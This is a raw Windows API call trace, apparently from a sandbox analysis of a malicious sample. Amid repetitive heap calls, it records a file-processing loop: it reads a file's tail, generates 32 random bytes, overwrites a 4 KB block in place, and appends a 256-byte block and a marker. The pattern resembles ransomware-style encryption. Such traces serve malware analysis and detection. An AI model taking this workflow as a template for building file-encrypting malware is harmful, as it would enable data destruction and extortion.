[0082.738] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.738] GetProcessHeap () returned 0x4f10000 [0082.738] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.738] GetProcessHeap () returned 0x4f10000 [0082.738] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.738] GetProcessHeap () returned 0x4f10000 [0082.738] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.738] GetProcessHeap () returned 0x4f10000 [0082.738] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.738] GetProcessHeap () returned 0x4f10000 [0082.738] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.738] GetProcessHeap () returned 0x4f10000 [0082.738] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.738] GetProcessHeap () returned 0x4f10000 [0082.738] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.738] GetProcessHeap () returned 0x4f10000 [0082.738] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.738] GetProcessHeap () returned 0x4f10000 [0082.738] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.738] GetProcessHeap () returned 0x4f10000 [0082.738] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.738] GetProcessHeap () returned 0x4f10000 [0082.738] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.738] GetProcessHeap () returned 0x4f10000 [0082.738] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.738] GetProcessHeap () returned 0x4f10000 [0082.738] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.738] GetProcessHeap () returned 0x4f10000 [0082.738] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.738] GetProcessHeap () returned 0x4f10000 [0082.738] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.738] GetProcessHeap () returned 0x4f10000 [0082.738] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.738] GetProcessHeap () returned 0x4f10000 [0082.738] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.738] GetProcessHeap () returned 0x4f10000 [0082.738] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.738] GetProcessHeap () returned 0x4f10000 [0082.738] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.739] GetProcessHeap () returned 0x4f10000 [0082.739] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.739] GetProcessHeap () returned 0x4f10000 [0082.739] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.739] GetProcessHeap () returned 0x4f10000 [0082.739] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.739] GetProcessHeap () returned 0x4f10000 [0082.739] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.739] GetProcessHeap () returned 0x4f10000 [0082.739] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.739] GetProcessHeap () returned 0x4f10000 [0082.739] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.739] GetProcessHeap () returned 0x4f10000 [0082.739] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.739] GetProcessHeap () returned 0x4f10000 [0082.739] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0082.739] GetProcessHeap () returned 0x4f10000 [0082.739] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.739] GetProcessHeap () returned 0x4f10000 [0082.739] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0082.739] GetProcessHeap () returned 0x4f10000 [0082.739] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0082.739] GetProcessHeap () returned 0x4f10000 [0082.739] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0082.739] GetProcessHeap () returned 0x4f10000 [0082.739] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0082.739] GetProcessHeap () returned 0x4f10000 [0082.739] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0082.739] GetProcessHeap () returned 0x4f10000 [0082.739] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0082.739] GetProcessHeap () returned 0x4f10000 [0082.739] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.739] GetProcessHeap () returned 0x4f10000 [0082.739] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0082.739] GetProcessHeap () returned 0x4f10000 [0082.739] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.739] GetProcessHeap () returned 0x4f10000 [0082.739] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.740] GetProcessHeap () returned 0x4f10000 [0082.740] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.740] GetProcessHeap () returned 0x4f10000 [0082.740] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.740] GetProcessHeap () returned 0x4f10000 [0082.740] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.740] GetProcessHeap () returned 0x4f10000 [0082.740] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.740] GetProcessHeap () returned 0x4f10000 [0082.740] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.740] GetProcessHeap () returned 0x4f10000 [0082.740] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.740] GetProcessHeap () returned 0x4f10000 [0082.740] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.740] GetProcessHeap () returned 0x4f10000 [0082.740] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.740] GetProcessHeap () returned 0x4f10000 [0082.740] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.740] GetProcessHeap () returned 0x4f10000 [0082.740] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.740] GetProcessHeap () returned 0x4f10000 [0082.740] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.740] GetProcessHeap () returned 0x4f10000 [0082.740] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.740] GetProcessHeap () returned 0x4f10000 [0082.740] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.740] GetProcessHeap () returned 0x4f10000 [0082.740] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.740] GetProcessHeap () returned 0x4f10000 [0082.741] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.741] GetProcessHeap () returned 0x4f10000 [0082.741] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.741] GetProcessHeap () returned 0x4f10000 [0082.741] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.741] GetProcessHeap () returned 0x4f10000 [0082.741] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.741] GetProcessHeap () returned 0x4f10000 [0082.741] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.741] GetProcessHeap () returned 0x4f10000 [0082.741] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.741] GetProcessHeap () returned 0x4f10000 [0082.741] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.741] GetProcessHeap () returned 0x4f10000 [0082.741] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.741] GetProcessHeap () returned 0x4f10000 [0082.741] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0082.741] GetProcessHeap () returned 0x4f10000 [0082.741] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.741] GetProcessHeap () returned 0x4f10000 [0082.741] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0082.741] GetProcessHeap () returned 0x4f10000 [0082.741] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0082.741] GetProcessHeap () returned 0x4f10000 [0082.741] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0082.741] GetProcessHeap () returned 0x4f10000 [0082.741] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0082.741] SetFilePointerEx (in: hFile=0x8dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.741] WriteFile (in: hFile=0x8dc, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0082.742] WriteFile (in: hFile=0x8dc, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0082.742] GetProcessHeap () returned 0x4f10000 [0082.742] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0082.742] GetProcessHeap () returned 0x4f10000 [0082.742] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0082.742] GetProcessHeap () returned 0x4f10000 [0082.742] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0082.742] CloseHandle (hObject=0x8dc) returned 1 [0082.743] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 88 [0082.743] SetFilePointerEx (in: hFile=0x8e0, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.743] ReadFile (in: hFile=0x8e0, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0082.743] SetFilePointerEx (in: hFile=0x8e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.743] GetProcessHeap () returned 0x4f10000 [0082.743] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0082.743] GetProcessHeap () returned 0x4f10000 [0082.743] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0082.743] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0082.743] GetProcessHeap () returned 0x4f10000 [0082.743] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0082.743] ReadFile (in: hFile=0x8e0, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0082.791] SetFilePointerEx (in: hFile=0x8e0, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.791] WriteFile (in: hFile=0x8e0, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0082.791] GetProcessHeap () returned 0x4f10000 [0082.791] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0082.791] GetProcessHeap () returned 0x4f10000 [0082.791] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0082.791] GetProcessHeap () returned 0x4f10000 [0082.791] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0082.791] GetProcessHeap () returned 0x4f10000 [0082.792] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0082.792] GetProcessHeap () returned 0x4f10000 [0082.792] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0082.792] GetProcessHeap () returned 0x4f10000 [0082.792] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0082.792] GetProcessHeap () returned 0x4f10000 [0082.792] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.792] GetProcessHeap () returned 0x4f10000 [0082.792] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.792] GetProcessHeap () returned 0x4f10000 [0082.792] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.792] GetProcessHeap () returned 0x4f10000 [0082.792] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.792] GetProcessHeap () returned 0x4f10000 [0082.792] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.792] GetProcessHeap () returned 0x4f10000 [0082.792] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.792] GetProcessHeap () returned 0x4f10000 [0082.792] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.792] GetProcessHeap () returned 0x4f10000 [0082.792] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.792] GetProcessHeap () returned 0x4f10000 [0082.792] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.792] GetProcessHeap () returned 0x4f10000 [0082.792] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.792] GetProcessHeap () returned 0x4f10000 [0082.792] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.792] GetProcessHeap () returned 0x4f10000 [0082.792] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.792] GetProcessHeap () returned 0x4f10000 [0082.792] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.792] GetProcessHeap () returned 0x4f10000 [0082.792] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.792] GetProcessHeap () returned 0x4f10000 [0082.792] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.792] GetProcessHeap () returned 0x4f10000 [0082.792] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.792] GetProcessHeap () returned 0x4f10000 [0082.792] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.792] GetProcessHeap () returned 0x4f10000 [0082.793] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.793] GetProcessHeap () returned 0x4f10000 [0082.793] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.793] GetProcessHeap () returned 0x4f10000 [0082.793] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.793] GetProcessHeap () returned 0x4f10000 [0082.793] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.793] GetProcessHeap () returned 0x4f10000 [0082.793] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.793] GetProcessHeap () returned 0x4f10000 [0082.793] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.793] GetProcessHeap () returned 0x4f10000 [0082.793] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.793] GetProcessHeap () returned 0x4f10000 [0082.793] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.793] GetProcessHeap () returned 0x4f10000 [0082.793] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.793] GetProcessHeap () returned 0x4f10000 [0082.793] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.793] GetProcessHeap () returned 0x4f10000 [0082.793] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.793] GetProcessHeap () returned 0x4f10000 [0082.793] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.793] GetProcessHeap () returned 0x4f10000 [0082.793] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.793] GetProcessHeap () returned 0x4f10000 [0082.793] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.793] GetProcessHeap () returned 0x4f10000 [0082.793] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.793] GetProcessHeap () returned 0x4f10000 [0082.793] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0082.793] GetProcessHeap () returned 0x4f10000 [0082.793] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.793] GetProcessHeap () returned 0x4f10000 [0082.793] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0082.793] GetProcessHeap () returned 0x4f10000 [0082.793] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0082.793] GetProcessHeap () returned 0x4f10000 [0082.793] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0082.793] GetProcessHeap () returned 0x4f10000 [0082.794] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0082.794] GetProcessHeap () returned 0x4f10000 [0082.794] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0082.794] GetProcessHeap () returned 0x4f10000 [0082.794] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0082.794] GetProcessHeap () returned 0x4f10000 [0082.794] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.794] GetProcessHeap () returned 0x4f10000 [0082.794] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0082.794] GetProcessHeap () returned 0x4f10000 [0082.794] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.794] GetProcessHeap () returned 0x4f10000 [0082.794] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.794] GetProcessHeap () returned 0x4f10000 [0082.794] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.794] GetProcessHeap () returned 0x4f10000 [0082.794] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.794] GetProcessHeap () returned 0x4f10000 [0082.794] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.794] GetProcessHeap () returned 0x4f10000 [0082.794] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.794] GetProcessHeap () returned 0x4f10000 [0082.794] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.794] GetProcessHeap () returned 0x4f10000 [0082.794] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.795] GetProcessHeap () returned 0x4f10000 [0082.795] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.795] GetProcessHeap () returned 0x4f10000 [0082.795] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.795] GetProcessHeap () returned 0x4f10000 [0082.795] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.795] GetProcessHeap () returned 0x4f10000 [0082.795] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.795] GetProcessHeap () returned 0x4f10000 [0082.795] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.795] GetProcessHeap () returned 0x4f10000 [0082.795] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.795] GetProcessHeap () returned 0x4f10000 [0082.795] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.795] GetProcessHeap () returned 0x4f10000 [0082.795] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.795] GetProcessHeap () returned 0x4f10000 [0082.795] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.795] GetProcessHeap () returned 0x4f10000 [0082.795] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.795] GetProcessHeap () returned 0x4f10000 [0082.795] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.795] GetProcessHeap () returned 0x4f10000 [0082.795] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.795] GetProcessHeap () returned 0x4f10000 [0082.795] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.795] GetProcessHeap () returned 0x4f10000 [0082.795] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.795] GetProcessHeap () returned 0x4f10000 [0082.796] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.796] GetProcessHeap () returned 0x4f10000 [0082.796] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.796] GetProcessHeap () returned 0x4f10000 [0082.796] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0082.796] GetProcessHeap () returned 0x4f10000 [0082.796] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.796] GetProcessHeap () returned 0x4f10000 [0082.796] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0082.796] GetProcessHeap () returned 0x4f10000 [0082.796] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0082.796] GetProcessHeap () returned 0x4f10000 [0082.796] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0082.796] GetProcessHeap () returned 0x4f10000 [0082.796] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0082.796] SetFilePointerEx (in: hFile=0x8e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.796] WriteFile (in: hFile=0x8e0, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0082.796] WriteFile (in: hFile=0x8e0, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0082.796] GetProcessHeap () returned 0x4f10000 [0082.796] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: 